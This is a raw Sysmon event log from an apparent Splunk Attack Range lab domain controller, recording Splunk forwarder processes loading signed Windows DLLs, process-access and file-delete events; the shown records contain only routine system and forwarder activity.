734700x800000000000000098678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x800000000000000098677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2trueSplunk, Inc.Valid 10341000x800000000000000098672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.547{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x800000000000000098665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.062{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000098664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.062{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.062{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x800000000000000098719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:48.859{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3EB755BAFF1CAC8AAF894D3F0DC9F78,SHA256=E0B1F8405A7B13332D9779D809EE18DD0F5B5632C7D29D926ED94A4BE69E86F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:48.609{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=D1A2FA588820B113B6F585ADCBED47D1,SHA256=3ECA82BAFE47000213E3B79CA266CCD307C065FA33CB831653A3FE4DDB32A4C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:48.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4053AD6E4E3D0F328B3852A55E66E713,SHA256=F4797A01E1FC7597EEF81ED4CD92FC0179664ABB2D2E16A417F042361211A676,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.890{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000098821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.890{326FD73D-C0B5-6294-330B-000000005502}56966972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.890{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.890{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft 